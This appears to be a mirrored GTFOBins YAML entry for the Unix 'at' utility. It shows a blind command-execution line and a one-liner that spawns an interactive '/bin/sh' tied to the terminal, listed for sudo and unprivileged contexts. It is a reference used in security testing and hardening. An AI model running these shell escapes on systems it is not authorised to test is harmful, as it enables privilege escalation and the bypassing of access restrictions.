mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
19 lines
344 B
Plaintext
19 lines
344 B
Plaintext
---
|
|
functions:
|
|
command:
|
|
- blind: true
|
|
code: |-
|
|
echo /path/to/command | at now
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
|
|
comment: |-
|
|
`tail` is used to pause the terminal.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|